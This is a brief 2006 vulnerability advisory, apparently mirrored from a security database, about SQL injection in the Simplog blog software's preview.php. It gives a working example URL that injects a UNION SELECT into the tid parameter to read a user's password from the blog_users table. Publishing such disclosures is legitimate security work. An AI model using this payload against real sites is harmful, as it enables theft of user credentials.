Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14759
HistoryOct 21, 2006 - 12:00 a.m.

SQL Injection simplog

2006-10-2100:00:00
vulners.com
44

Softare: Simplog www.simplog.org
version:0.9.3.1 (i assume others as well)

There are a few sql injections available with this software. This one is in preview.php

eg.

http://site/preview.php?blogid=2&adm=tem&tid=-1%20union%20select%20passw
ord%20from%20blog_users%20where%20name='[insert username here]'